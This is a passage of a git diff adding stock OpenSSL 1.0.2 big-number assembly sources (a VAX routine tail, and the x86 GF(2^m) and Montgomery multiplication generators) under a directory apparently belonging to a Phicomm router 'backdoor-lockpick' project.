+	bicl3	#32767,-24(fp),r0
+	extzv	#15,#17,r0,r0
+	addl2	r0,r4
+	bicl3	#-65536,-24(fp),r0
+	ashl	#17,r0,-24(fp)
+	addl2	-24(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-24(fp)
+	bgequ	noname.593
+	incl	r4
+noname.593:
+	movl	r5,r1
+	movl	r4,r2
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.594
+	incl	r2
+noname.594:
+	addl2	r2,r10
+	bicl2	#0,r10
+	cmpl	r10,r2
+	bgequ	noname.595
+	incl	r9
+noname.595:
+
+	bicl3	#-65536,12(r3),r4
+	movzwl	14(r3),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,4(r3),r2
+	movzwl	6(r3),r0
+	bicl2	#-65536,r0
+	movl	r4,r6
+	movl	r1,r5
+	mull3	r0,r6,-28(fp)
+	mull2	r2,r6
+	mull3	r2,r5,-32(fp)
+	mull2	r0,r5
+	addl3	-28(fp),-32(fp),r0
+	bicl3	#0,r0,-28(fp)
+	cmpl	-28(fp),-32(fp)
+	bgequ	noname.596
+	addl2	#65536,r5
+noname.596:
+	movzwl	-26(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r5
+	bicl3	#-65536,-28(fp),r0
+	ashl	#16,r0,-32(fp)
+	addl2	-32(fp),r6
+	bicl2	#0,r6
+	cmpl	r6,-32(fp)
+	bgequ	noname.597
+	incl	r5
+noname.597:
+	movl	r6,r3
+	movl	r5,r2
+	bbc	#31,r2,noname.598
+	incl	r9
+noname.598:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.599
+	incl	r2
+noname.599:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r8
+	bicl2	#0,r8
+	cmpl	r8,r3
+	bgequ	noname.600
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.600
+	incl	r9
+noname.600:
+	addl2	r2,r10
+	bicl2	#0,r10
+	cmpl	r10,r2
+	bgequ	noname.601
+	incl	r9
+noname.601:
+
+	movl	4(ap),r0
+	movl	r8,16(r0)
+
+	clrl	r8
+
+	movl	8(ap),r0
+	bicl3	#-65536,12(r0),r3
+	movzwl	14(r0),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,8(r0),r2
+	movzwl	10(r0),r0
+	bicl2	#-65536,r0
+	movl	r3,r5
+	movl	r1,r4
+	mull3	r0,r5,-36(fp)
+	mull2	r2,r5
+	mull3	r2,r4,-40(fp)
+	mull2	r0,r4
+	addl3	-36(fp),-40(fp),r0
+	bicl3	#0,r0,-36(fp)
+	cmpl	-36(fp),-40(fp)
+	bgequ	noname.602
+	addl2	#65536,r4
+noname.602:
+	movzwl	-34(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,r4
+	bicl3	#-65536,-36(fp),r0
+	ashl	#16,r0,-40(fp)
+	addl2	-40(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-40(fp)
+	bgequ	noname.603
+	incl	r4
+noname.603:
+	movl	r5,r3
+	movl	r4,r2
+	bbc	#31,r2,noname.604
+	incl	r8
+noname.604:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.605
+	incl	r2
+noname.605:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r10
+	bicl2	#0,r10
+	cmpl	r10,r3
+	bgequ	noname.606
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.606
+	incl	r8
+noname.606:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.607
+	incl	r8
+noname.607:
+
+	movl	4(ap),r4
+	movl	r10,20(r4)
+
+	clrl	r10
+
+	movl	8(ap),r0
+	movl	12(r0),r3
+	bicl3	#-65536,r3,r5
+	extzv	#16,#16,r3,r0
+	bicl3	#-65536,r0,r3
+	mull3	r5,r3,-44(fp)
+	mull2	r5,r5
+	mull2	r3,r3
+	bicl3	#32767,-44(fp),r0
+	extzv	#15,#17,r0,r0
+	addl2	r0,r3
+	bicl3	#-65536,-44(fp),r0
+	ashl	#17,r0,-44(fp)
+	addl2	-44(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-44(fp)
+	bgequ	noname.608
+	incl	r3
+noname.608:
+	movl	r5,r1
+	movl	r3,r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.609
+	incl	r2
+noname.609:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.610
+	incl	r10
+noname.610:
+
+	movl	r9,24(r4)
+
+	movl	r8,28(r4)
+
+	ret	
+
+; For now, the code below doesn't work, so I end this prematurely.
+.end
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86-gf2m.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86-gf2m.pl
new file mode 100644
index 0000000..808a1e5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86-gf2m.pl
@@ -0,0 +1,313 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# May 2011
+#
+# The module implements bn_GF2m_mul_2x2 polynomial multiplication used
+# in bn_gf2m.c. It's kind of low-hanging mechanical port from C for
+# the time being... Except that it has three code paths: pure integer
+# code suitable for any x86 CPU, MMX code suitable for PIII and later
+# and PCLMULQDQ suitable for Westmere and later. Improvement varies
+# from one benchmark and µ-arch to another. Below are interval values
+# for 163- and 571-bit ECDH benchmarks relative to compiler-generated
+# code:
+#
+# PIII		16%-30%
+# P4		12%-12%
+# Opteron	18%-40%
+# Core2		19%-44%
+# Atom		38%-64%
+# Westmere	53%-121%(PCLMULQDQ)/20%-32%(MMX)
+# Sandy Bridge	72%-127%(PCLMULQDQ)/27%-23%(MMX)
+#
+# Note that above improvement coefficients are not coefficients for
+# bn_GF2m_mul_2x2 itself. For example 120% ECDH improvement is result
+# of bn_GF2m_mul_2x2 being >4x faster. As it gets faster, benchmark
+# is more and more dominated by other subroutines, most notably by
+# BN_GF2m_mod[_mul]_arr...
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+push(@INC,"${dir}","${dir}../../perlasm");
+require "x86asm.pl";
+
+&asm_init($ARGV[0],$0,$x86only = $ARGV[$#ARGV] eq "386");
+
+$sse2=0;
+for (@ARGV) { $sse2=1 if (/-DOPENSSL_IA32_SSE2/); }
+
+&external_label("OPENSSL_ia32cap_P") if ($sse2);
+
+$a="eax";
+$b="ebx";
+($a1,$a2,$a4)=("ecx","edx","ebp");
+
+$R="mm0";
+@T=("mm1","mm2");
+($A,$B,$B30,$B31)=("mm2","mm3","mm4","mm5");
+@i=("esi","edi");
+
+					if (!$x86only) {
+&function_begin_B("_mul_1x1_mmx");
+	&sub	("esp",32+4);
+	 &mov	($a1,$a);
+	 &lea	($a2,&DWP(0,$a,$a));
+	 &and	($a1,0x3fffffff);
+	 &lea	($a4,&DWP(0,$a2,$a2));
+	 &mov	(&DWP(0*4,"esp"),0);
+	 &and	($a2,0x7fffffff);
+	&movd	($A,$a);
+	&movd	($B,$b);
+	 &mov	(&DWP(1*4,"esp"),$a1);	# a1
+	 &xor	($a1,$a2);		# a1^a2
+	&pxor	($B31,$B31);
+	&pxor	($B30,$B30);
+	 &mov	(&DWP(2*4,"esp"),$a2);	# a2
+	 &xor	($a2,$a4);		# a2^a4
+	 &mov	(&DWP(3*4,"esp"),$a1);	# a1^a2
+	&pcmpgtd($B31,$A);		# broadcast 31st bit
+	&paddd	($A,$A);		# $A<<=1
+	 &xor	($a1,$a2);		# a1^a4=a1^a2^a2^a4
+	 &mov	(&DWP(4*4,"esp"),$a4);	# a4
+	 &xor	($a4,$a2);		# a2=a4^a2^a4
+	&pand	($B31,$B);
+	&pcmpgtd($B30,$A);		# broadcast 30th bit
+	 &mov	(&DWP(5*4,"esp"),$a1);	# a1^a4
+	 &xor	($a4,$a1);		# a1^a2^a4
+	&psllq	($B31,31);
+	&pand	($B30,$B);
+	 &mov	(&DWP(6*4,"esp"),$a2);	# a2^a4
+	&mov	(@i[0],0x7);
+	 &mov	(&DWP(7*4,"esp"),$a4);	# a1^a2^a4
+	 &mov	($a4,@i[0]);
+	&and	(@i[0],$b);
+	&shr	($b,3);
+	&mov	(@i[1],$a4);
+	&psllq	($B30,30);
+	&and	(@i[1],$b);
+	&shr	($b,3);
+	&movd	($R,&DWP(0,"esp",@i[0],4));
+	&mov	(@i[0],$a4);
+	&and	(@i[0],$b);
+	&shr	($b,3);
+	for($n=1;$n<9;$n++) {
+		&movd	(@T[1],&DWP(0,"esp",@i[1],4));
+		&mov	(@i[1],$a4);
+		&psllq	(@T[1],3*$n);
+		&and	(@i[1],$b);
+		&shr	($b,3);
+		&pxor	($R,@T[1]);
+
+		push(@i,shift(@i)); push(@T,shift(@T));
+	}
+	&movd	(@T[1],&DWP(0,"esp",@i[1],4));
+	&pxor	($R,$B30);
+	&psllq	(@T[1],3*$n++);
+	&pxor	($R,@T[1]);
+
+	&movd	(@T[0],&DWP(0,"esp",@i[0],4));
+	&pxor	($R,$B31);
+	&psllq	(@T[0],3*$n);
+	&add	("esp",32+4);
+	&pxor	($R,@T[0]);
+	&ret	();
+&function_end_B("_mul_1x1_mmx");
+					}
+
+($lo,$hi)=("eax","edx");
+@T=("ecx","ebp");
+
+&function_begin_B("_mul_1x1_ialu");
+	&sub	("esp",32+4);
+	 &mov	($a1,$a);
+	 &lea	($a2,&DWP(0,$a,$a));
+	 &lea	($a4,&DWP(0,"",$a,4));
+	 &and	($a1,0x3fffffff);
+	&lea	(@i[1],&DWP(0,$lo,$lo));
+	&sar	($lo,31);		# broadcast 31st bit
+	 &mov	(&DWP(0*4,"esp"),0);
+	 &and	($a2,0x7fffffff);
+	 &mov	(&DWP(1*4,"esp"),$a1);	# a1
+	 &xor	($a1,$a2);		# a1^a2
+	 &mov	(&DWP(2*4,"esp"),$a2);	# a2
+	 &xor	($a2,$a4);		# a2^a4
+	 &mov	(&DWP(3*4,"esp"),$a1);	# a1^a2
+	 &xor	($a1,$a2);		# a1^a4=a1^a2^a2^a4
+	 &mov	(&DWP(4*4,"esp"),$a4);	# a4
+	 &xor	($a4,$a2);		# a2=a4^a2^a4
+	 &mov	(&DWP(5*4,"esp"),$a1);	# a1^a4
+	 &xor	($a4,$a1);		# a1^a2^a4
+	&sar	(@i[1],31);		# broardcast 30th bit
+	&and	($lo,$b);
+	 &mov	(&DWP(6*4,"esp"),$a2);	# a2^a4
+	&and	(@i[1],$b);
+	 &mov	(&DWP(7*4,"esp"),$a4);	# a1^a2^a4
+	&mov	($hi,$lo);
+	&shl	($lo,31);
+	&mov	(@T[0],@i[1]);
+	&shr	($hi,1);
+
+	 &mov	(@i[0],0x7);
+	&shl	(@i[1],30);
+	 &and	(@i[0],$b);
+	&shr	(@T[0],2);
+	&xor	($lo,@i[1]);
+
+	&shr	($b,3);
+	&mov	(@i[1],0x7);		# 5-byte instruction!?
+	&and	(@i[1],$b);
+	&shr	($b,3);
+	 &xor	($hi,@T[0]);
+	&xor	($lo,&DWP(0,"esp",@i[0],4));
+	&mov	(@i[0],0x7);
+	&and	(@i[0],$b);
+	&shr	($b,3);
+	for($n=1;$n<9;$n++) {
+		&mov	(@T[1],&DWP(0,"esp",@i[1],4));
+		&mov	(@i[1],0x7);
+		&mov	(@T[0],@T[1]);
+		&shl	(@T[1],3*$n);
+		&and	(@i[1],$b);
+		&shr	(@T[0],32-3*$n);
+		&xor	($lo,@T[1]);
+		&shr	($b,3);
+		&xor	($hi,@T[0]);
+
+		push(@i,shift(@i)); push(@T,shift(@T));
+	}
+	&mov	(@T[1],&DWP(0,"esp",@i[1],4));
+	&mov	(@T[0],@T[1]);
+	&shl	(@T[1],3*$n);
+	&mov	(@i[1],&DWP(0,"esp",@i[0],4));
+	&shr	(@T[0],32-3*$n);	$n++;
+	&mov	(@i[0],@i[1]);
+	&xor	($lo,@T[1]);
+	&shl	(@i[1],3*$n);
+	&xor	($hi,@T[0]);
+	&shr	(@i[0],32-3*$n);
+	&xor	($lo,@i[1]);
+	&xor	($hi,@i[0]);
+
+	&add	("esp",32+4);
+	&ret	();
+&function_end_B("_mul_1x1_ialu");
+
+# void bn_GF2m_mul_2x2(BN_ULONG *r, BN_ULONG a1, BN_ULONG a0, BN_ULONG b1, BN_ULONG b0);
+&function_begin_B("bn_GF2m_mul_2x2");
+if (!$x86only) {
+	&picmeup("edx","OPENSSL_ia32cap_P");
+	&mov	("eax",&DWP(0,"edx"));
+	&mov	("edx",&DWP(4,"edx"));
+	&test	("eax",1<<23);		# check MMX bit
+	&jz	(&label("ialu"));
+if ($sse2) {
+	&test	("eax",1<<24);		# check FXSR bit
+	&jz	(&label("mmx"));
+	&test	("edx",1<<1);		# check PCLMULQDQ bit
+	&jz	(&label("mmx"));
+
+	&movups		("xmm0",&QWP(8,"esp"));
+	&shufps		("xmm0","xmm0",0b10110001);
+	&pclmulqdq	("xmm0","xmm0",1);
+	&mov		("eax",&DWP(4,"esp"));
+	&movups		(&QWP(0,"eax"),"xmm0");
+	&ret	();
+
+&set_label("mmx",16);
+}
+	&push	("ebp");
+	&push	("ebx");
+	&push	("esi");
+	&push	("edi");
+	&mov	($a,&wparam(1));
+	&mov	($b,&wparam(3));
+	&call	("_mul_1x1_mmx");	# a1·b1
+	&movq	("mm7",$R);
+
+	&mov	($a,&wparam(2));
+	&mov	($b,&wparam(4));
+	&call	("_mul_1x1_mmx");	# a0·b0
+	&movq	("mm6",$R);
+
+	&mov	($a,&wparam(1));
+	&mov	($b,&wparam(3));
+	&xor	($a,&wparam(2));
+	&xor	($b,&wparam(4));
+	&call	("_mul_1x1_mmx");	# (a0+a1)·(b0+b1)
+	&pxor	($R,"mm7");
+	&mov	($a,&wparam(0));
+	&pxor	($R,"mm6");		# (a0+a1)·(b0+b1)-a1·b1-a0·b0
+
+	&movq	($A,$R);
+	&psllq	($R,32);
+	&pop	("edi");
+	&psrlq	($A,32);
+	&pop	("esi");
+	&pxor	($R,"mm6");
+	&pop	("ebx");
+	&pxor	($A,"mm7");
+	&movq	(&QWP(0,$a),$R);
+	&pop	("ebp");
+	&movq	(&QWP(8,$a),$A);
+	&emms	();
+	&ret	();
+&set_label("ialu",16);
+}
+	&push	("ebp");
+	&push	("ebx");
+	&push	("esi");
+	&push	("edi");
+	&stack_push(4+1);
+
+	&mov	($a,&wparam(1));
+	&mov	($b,&wparam(3));
+	&call	("_mul_1x1_ialu");	# a1·b1
+	&mov	(&DWP(8,"esp"),$lo);
+	&mov	(&DWP(12,"esp"),$hi);
+
+	&mov	($a,&wparam(2));
+	&mov	($b,&wparam(4));
+	&call	("_mul_1x1_ialu");	# a0·b0
+	&mov	(&DWP(0,"esp"),$lo);
+	&mov	(&DWP(4,"esp"),$hi);
+
+	&mov	($a,&wparam(1));
+	&mov	($b,&wparam(3));
+	&xor	($a,&wparam(2));
+	&xor	($b,&wparam(4));
+	&call	("_mul_1x1_ialu");	# (a0+a1)·(b0+b1)
+
+	&mov	("ebp",&wparam(0));
+		 @r=("ebx","ecx","edi","esi");
+	&mov	(@r[0],&DWP(0,"esp"));
+	&mov	(@r[1],&DWP(4,"esp"));
+	&mov	(@r[2],&DWP(8,"esp"));
+	&mov	(@r[3],&DWP(12,"esp"));
+
+	&xor	($lo,$hi);
+	&xor	($hi,@r[1]);
+	&xor	($lo,@r[0]);
+	&mov	(&DWP(0,"ebp"),@r[0]);
+	&xor	($hi,@r[2]);
+	&mov	(&DWP(12,"ebp"),@r[3]);
+	&xor	($lo,@r[3]);
+	&stack_pop(4+1);
+	&xor	($hi,@r[3]);
+	&pop	("edi");
+	&xor	($lo,$hi);
+	&pop	("esi");
+	&mov	(&DWP(8,"ebp"),$hi);
+	&pop	("ebx");
+	&mov	(&DWP(4,"ebp"),$lo);
+	&pop	("ebp");
+	&ret	();
+&function_end_B("bn_GF2m_mul_2x2");
+
+&asciz	("GF(2^m) Multiplication for x86, CRYPTOGAMS by <appro\@openssl.org>");
+
+&asm_finish();
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86-mont.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86-mont.pl
new file mode 100755
index 0000000..e8f6b05
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86-mont.pl
@@ -0,0 +1,593 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# October 2005
+#
+# This is a "teaser" code, as it can be improved in several ways...
+# First of all non-SSE2 path should be implemented (yes, for now it
+# performs Montgomery multiplication/convolution only on SSE2-capable
+# CPUs such as P4, others fall down to original code). Then inner loop
+# can be unrolled and modulo-scheduled to improve ILP and possibly
+# moved to 128-bit XMM register bank (though it would require input
+# rearrangement and/or increase bus bandwidth utilization). Dedicated
+# squaring procedure should give further performance improvement...
+# Yet, for being draft, the code improves rsa512 *sign* benchmark by
+# 110%(!), rsa1024 one - by 70% and rsa4096 - by 20%:-)
+
+# December 2006
+#
+# Modulo-scheduling SSE2 loops results in further 15-20% improvement.
+# Integer-only code [being equipped with dedicated squaring procedure]
+# gives ~40% on rsa512 sign benchmark...
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+push(@INC,"${dir}","${dir}../../perlasm");
+require "x86asm.pl";
+
+&asm_init($ARGV[0],$0);
+
+$sse2=0;
+for (@ARGV) { $sse2=1 if (/-DOPENSSL_IA32_SSE2/); }
+
+&external_label("OPENSSL_ia32cap_P") if ($sse2);
+
+&function_begin("bn_mul_mont");
+
+$i="edx";
+$j="ecx";
+$ap="esi";	$tp="esi";		# overlapping variables!!!
+$rp="edi";	$bp="edi";		# overlapping variables!!!
+$np="ebp";
+$num="ebx";
+
+$_num=&DWP(4*0,"esp");			# stack top layout
+$_rp=&DWP(4*1,"esp");
+$_ap=&DWP(4*2,"esp");
+$_bp=&DWP(4*3,"esp");
+$_np=&DWP(4*4,"esp");
+$_n0=&DWP(4*5,"esp");	$_n0q=&QWP(4*5,"esp");
+$_sp=&DWP(4*6,"esp");
+$_bpend=&DWP(4*7,"esp");
+$frame=32;				# size of above frame rounded up to 16n
+
+	&xor	("eax","eax");
+	&mov	("edi",&wparam(5));	# int num
+	&cmp	("edi",4);
+	&jl	(&label("just_leave"));
+
+	&lea	("esi",&wparam(0));	# put aside pointer to argument block
+	&lea	("edx",&wparam(1));	# load ap
+	&mov	("ebp","esp");		# saved stack pointer!
+	&add	("edi",2);		# extra two words on top of tp
+	&neg	("edi");
+	&lea	("esp",&DWP(-$frame,"esp","edi",4));	# alloca($frame+4*(num+2))
+	&neg	("edi");
+
+	# minimize cache contention by arraning 2K window between stack
+	# pointer and ap argument [np is also position sensitive vector,
+	# but it's assumed to be near ap, as it's allocated at ~same
+	# time].
+	&mov	("eax","esp");
+	&sub	("eax","edx");
+	&and	("eax",2047);
+	&sub	("esp","eax");		# this aligns sp and ap modulo 2048
+
+	&xor	("edx","esp");
+	&and	("edx",2048);
+	&xor	("edx",2048);
+	&sub	("esp","edx");		# this splits them apart modulo 4096
+
+	&and	("esp",-64);		# align to cache line
+
+	################################# load argument block...
+	&mov	("eax",&DWP(0*4,"esi"));# BN_ULONG *rp
+	&mov	("ebx",&DWP(1*4,"esi"));# const BN_ULONG *ap
+	&mov	("ecx",&DWP(2*4,"esi"));# const BN_ULONG *bp
+	&mov	("edx",&DWP(3*4,"esi"));# const BN_ULONG *np
+	&mov	("esi",&DWP(4*4,"esi"));# const BN_ULONG *n0
+	#&mov	("edi",&DWP(5*4,"esi"));# int num
+
+	&mov	("esi",&DWP(0,"esi"));	# pull n0[0]
+	&mov	($_rp,"eax");		# ... save a copy of argument block
+	&mov	($_ap,"ebx");
+	&mov	($_bp,"ecx");
+	&mov	($_np,"edx");
+	&mov	($_n0,"esi");
+	&lea	($num,&DWP(-3,"edi"));	# num=num-1 to assist modulo-scheduling
+	#&mov	($_num,$num);		# redundant as $num is not reused
+	&mov	($_sp,"ebp");		# saved stack pointer!
+
+if($sse2) {
+$acc0="mm0";	# mmx register bank layout
+$acc1="mm1";
+$car0="mm2";
+$car1="mm3";
+$mul0="mm4";
+$mul1="mm5";
+$temp="mm6";
+$mask="mm7";
+
+	&picmeup("eax","OPENSSL_ia32cap_P");
+	&bt	(&DWP(0,"eax"),26);
+	&jnc	(&label("non_sse2"));
+
+	&mov	("eax",-1);
+	&movd	($mask,"eax");		# mask 32 lower bits
+
+	&mov	($ap,$_ap);		# load input pointers
+	&mov	($bp,$_bp);
+	&mov	($np,$_np);
+
+	&xor	($i,$i);		# i=0
+	&xor	($j,$j);		# j=0
+
+	&movd	($mul0,&DWP(0,$bp));		# bp[0]
+	&movd	($mul1,&DWP(0,$ap));		# ap[0]
+	&movd	($car1,&DWP(0,$np));		# np[0]
+
+	&pmuludq($mul1,$mul0);			# ap[0]*bp[0]
+	&movq	($car0,$mul1);
+	&movq	($acc0,$mul1);			# I wish movd worked for
+	&pand	($acc0,$mask);			# inter-register transfers
+
+	&pmuludq($mul1,$_n0q);			# *=n0
+
+	&pmuludq($car1,$mul1);			# "t[0]"*np[0]*n0
+	&paddq	($car1,$acc0);
+
+	&movd	($acc1,&DWP(4,$np));		# np[1]
+	&movd	($acc0,&DWP(4,$ap));		# ap[1]
+
+	&psrlq	($car0,32);
+	&psrlq	($car1,32);
+
+	&inc	($j);				# j++
+&set_label("1st",16);
+	&pmuludq($acc0,$mul0);			# ap[j]*bp[0]
+	&pmuludq($acc1,$mul1);			# np[j]*m1
+	&paddq	($car0,$acc0);			# +=c0
+	&paddq	($car1,$acc1);			# +=c1
+
+	&movq	($acc0,$car0);
+	&pand	($acc0,$mask);
+	&movd	($acc1,&DWP(4,$np,$j,4));	# np[j+1]
+	&paddq	($car1,$acc0);			# +=ap[j]*bp[0];
+	&movd	($acc0,&DWP(4,$ap,$j,4));	# ap[j+1]
+	&psrlq	($car0,32);
+	&movd	(&DWP($frame-4,"esp",$j,4),$car1);	# tp[j-1]=
+	&psrlq	($car1,32);
+
+	&lea	($j,&DWP(1,$j));
+	&cmp	($j,$num);
+	&jl	(&label("1st"));
+
+	&pmuludq($acc0,$mul0);			# ap[num-1]*bp[0]
+	&pmuludq($acc1,$mul1);			# np[num-1]*m1
+	&paddq	($car0,$acc0);			# +=c0
+	&paddq	($car1,$acc1);			# +=c1
+
+	&movq	($acc0,$car0);
+	&pand	($acc0,$mask);
+	&paddq	($car1,$acc0);			# +=ap[num-1]*bp[0];
+	&movd	(&DWP($frame-4,"esp",$j,4),$car1);	# tp[num-2]=
+
+	&psrlq	($car0,32);
+	&psrlq	($car1,32);
+
+	&paddq	($car1,$car0);
+	&movq	(&QWP($frame,"esp",$num,4),$car1);	# tp[num].tp[num-1]
+
+	&inc	($i);				# i++
+&set_label("outer");
+	&xor	($j,$j);			# j=0
+
+	&movd	($mul0,&DWP(0,$bp,$i,4));	# bp[i]
+	&movd	($mul1,&DWP(0,$ap));		# ap[0]
+	&movd	($temp,&DWP($frame,"esp"));	# tp[0]
+	&movd	($car1,&DWP(0,$np));		# np[0]
+	&pmuludq($mul1,$mul0);			# ap[0]*bp[i]
+
+	&paddq	($mul1,$temp);			# +=tp[0]
+	&movq	($acc0,$mul1);
+	&movq	($car0,$mul1);
+	&pand	($acc0,$mask);
+
+	&pmuludq($mul1,$_n0q);			# *=n0
+
+	&pmuludq($car1,$mul1);
+	&paddq	($car1,$acc0);
+
+	&movd	($temp,&DWP($frame+4,"esp"));	# tp[1]
+	&movd	($acc1,&DWP(4,$np));		# np[1]
+	&movd	($acc0,&DWP(4,$ap));		# ap[1]
+
+	&psrlq	($car0,32);
+	&psrlq	($car1,32);
+	&paddq	($car0,$temp);			# +=tp[1]
+
+	&inc	($j);				# j++
+	&dec	($num);
+&set_label("inner");
+	&pmuludq($acc0,$mul0);			# ap[j]*bp[i]
+	&pmuludq($acc1,$mul1);			# np[j]*m1
+	&paddq	($car0,$acc0);			# +=c0
+	&paddq	($car1,$acc1);			# +=c1
+
+	&movq	($acc0,$car0);
+	&movd	($temp,&DWP($frame+4,"esp",$j,4));# tp[j+1]
+	&pand	($acc0,$mask);
+	&movd	($acc1,&DWP(4,$np,$j,4));	# np[j+1]
+	&paddq	($car1,$acc0);			# +=ap[j]*bp[i]+tp[j]
+	&movd	($acc0,&DWP(4,$ap,$j,4));	# ap[j+1]
+	&psrlq	($car0,32);
+	&movd	(&DWP($frame-4,"esp",$j,4),$car1);# tp[j-1]=
+	&psrlq	($car1,32);
+	&paddq	($car0,$temp);			# +=tp[j+1]
+
+	&dec	($num);
+	&lea	($j,&DWP(1,$j));		# j++
+	&jnz	(&label("inner"));
+
+	&mov	($num,$j);
+	&pmuludq($acc0,$mul0);			# ap[num-1]*bp[i]
+	&pmuludq($acc1,$mul1);			# np[num-1]*m1
+	&paddq	($car0,$acc0);			# +=c0
+	&paddq	($car1,$acc1);			# +=c1
+
+	&movq	($acc0,$car0);
+	&pand	($acc0,$mask);
+	&paddq	($car1,$acc0);			# +=ap[num-1]*bp[i]+tp[num-1]
+	&movd	(&DWP($frame-4,"esp",$j,4),$car1);	# tp[num-2]=
+	&psrlq	($car0,32);
+	&psrlq	($car1,32);
+
+	&movd	($temp,&DWP($frame+4,"esp",$num,4));	# += tp[num]
+	&paddq	($car1,$car0);
+	&paddq	($car1,$temp);
+	&movq	(&QWP($frame,"esp",$num,4),$car1);	# tp[num].tp[num-1]
+
+	&lea	($i,&DWP(1,$i));		# i++
+	&cmp	($i,$num);
+	&jle	(&label("outer"));
+
+	&emms	();				# done with mmx bank
+	&jmp	(&label("common_tail"));
+
+&set_label("non_sse2",16);
+}
+
+if (0) {
+	&mov	("esp",$_sp);
+	&xor	("eax","eax");	# signal "not fast enough [yet]"
+	&jmp	(&label("just_leave"));
+	# While the below code provides competitive performance for
+	# all key lengthes on modern Intel cores, it's still more
+	# than 10% slower for 4096-bit key elsewhere:-( "Competitive"
+	# means compared to the original integer-only assembler.
+	# 512-bit RSA sign is better by ~40%, but that's about all
+	# one can say about all CPUs...
+} else {
+$inp="esi";	# integer path uses these registers differently
+$word="edi";
+$carry="ebp";
+
+	&mov	($inp,$_ap);
+	&lea	($carry,&DWP(1,$num));
+	&mov	($word,$_bp);
+	&xor	($j,$j);				# j=0
+	&mov	("edx",$inp);
+	&and	($carry,1);				# see if num is even
+	&sub	("edx",$word);				# see if ap==bp
+	&lea	("eax",&DWP(4,$word,$num,4));		# &bp[num]
+	&or	($carry,"edx");
+	&mov	($word,&DWP(0,$word));			# bp[0]
+	&jz	(&label("bn_sqr_mont"));
+	&mov	($_bpend,"eax");
+	&mov	("eax",&DWP(0,$inp));
+	&xor	("edx","edx");
+
+&set_label("mull",16);
+	&mov	($carry,"edx");
+	&mul	($word);				# ap[j]*bp[0]
+	&add	($carry,"eax");
+	&lea	($j,&DWP(1,$j));
+	&adc	("edx",0);
+	&mov	("eax",&DWP(0,$inp,$j,4));		# ap[j+1]
+	&cmp	($j,$num);
+	&mov	(&DWP($frame-4,"esp",$j,4),$carry);	# tp[j]=
+	&jl	(&label("mull"));
+
+	&mov	($carry,"edx");
+	&mul	($word);				# ap[num-1]*bp[0]
+	 &mov	($word,$_n0);
+	&add	("eax",$carry);
+	 &mov	($inp,$_np);
+	&adc	("edx",0);
+	 &imul	($word,&DWP($frame,"esp"));		# n0*tp[0]
+
+	&mov	(&DWP($frame,"esp",$num,4),"eax");	# tp[num-1]=
+	&xor	($j,$j);
+	&mov	(&DWP($frame+4,"esp",$num,4),"edx");	# tp[num]=
+	&mov	(&DWP($frame+8,"esp",$num,4),$j);	# tp[num+1]=
+
+	&mov	("eax",&DWP(0,$inp));			# np[0]
+	&mul	($word);				# np[0]*m
+	&add	("eax",&DWP($frame,"esp"));		# +=tp[0]
+	&mov	("eax",&DWP(4,$inp));			# np[1]
+	&adc	("edx",0);
+	&inc	($j);
+
+	&jmp	(&label("2ndmadd"));
+
+&set_label("1stmadd",16);
+	&mov	($carry,"edx");
+	&mul	($word);				# ap[j]*bp[i]
+	&add	($carry,&DWP($frame,"esp",$j,4));	# +=tp[j]
+	&lea	($j,&DWP(1,$j));
+	&adc	("edx",0);
+	&add	($carry,"eax");
+	&mov	("eax",&DWP(0,$inp,$j,4));		# ap[j+1]
+	&adc	("edx",0);
+	&cmp	($j,$num);
+	&mov	(&DWP($frame-4,"esp",$j,4),$carry);	# tp[j]=
+	&jl	(&label("1stmadd"));
+
+	&mov	($carry,"edx");
+	&mul	($word);				# ap[num-1]*bp[i]
+	&add	("eax",&DWP($frame,"esp",$num,4));	# +=tp[num-1]
+	 &mov	($word,$_n0);
+	&adc	("edx",0);
+	 &mov	($inp,$_np);
+	&add	($carry,"eax");
+	&adc	("edx",0);
+	 &imul	($word,&DWP($frame,"esp"));		# n0*tp[0]
+
+	&xor	($j,$j);
+	&add	("edx",&DWP($frame+4,"esp",$num,4));	# carry+=tp[num]
+	&mov	(&DWP($frame,"esp",$num,4),$carry);	# tp[num-1]=
